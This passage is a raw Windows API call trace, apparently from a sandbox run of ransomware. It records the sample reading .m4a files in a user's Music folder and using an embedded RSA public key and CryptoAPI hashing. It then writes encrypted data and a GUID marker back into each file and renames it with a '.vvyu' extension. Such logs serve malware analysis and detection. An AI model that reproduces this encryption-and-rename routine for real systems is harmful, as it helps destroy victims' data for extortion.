(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.311] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x27b0, lpOverlapped=0x0) returned 1 [0199.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.312] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x27b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.312] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.313] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.314] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.314] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.314] CloseHandle (hObject=0x510) returned 1 [0199.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0199.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.316] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\jZE7XRus.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\jze7xrus.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\jZE7XRus.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\jze7xrus.m4a.vvyu")) returned 1 [0199.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.318] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0199.321] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb57ff040, ftCreationTime.dwHighDateTime=0x1d8a3ad, ftLastAccessTime.dwLowDateTime=0x7c2b57f0, ftLastAccessTime.dwHighDateTime=0x1d8a4b9, ftLastWriteTime.dwLowDateTime=0x7c2b57f0, ftLastWriteTime.dwHighDateTime=0x1d8a4b9, nFileSizeHigh=0x0, nFileSizeLow=0x93c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o2CgGnJETcQ5zceImOM_.m4a", cAlternateFileName="O2CGGN~1.M4A")) returned 1 [0199.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.321] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\o2CgGnJETcQ5zceImOM_.m4a") returned=".m4a" [0199.321] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\o2CgGnJETcQ5zceImOM_.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\o2cggnjetcq5zceimom_.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.322] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=37829) returned 1 [0199.322] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.325] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x939f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.325] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.327] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.327] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x93c5, lpOverlapped=0x0) returned 1 [0199.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.329] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.330] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.330] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.330] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.330] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.330] GetLastError () returned 0x0 [0199.330] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.330] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.331] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.331] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.331] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x93d0) returned 0x2ea79b0 [0199.331] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f3d8 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f420 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.332] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0199.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3158 [0199.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3140 [0199.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0199.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0199.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.336] GetCurrentThreadId () returned 0x66c [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea64f0 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.336] GetCurrentThreadId () returned 0x66c [0199.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3158 [0199.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31b8 [0199.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31d0 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3170 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3140 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.343] HeapFree (in: hHeap=0x620000, 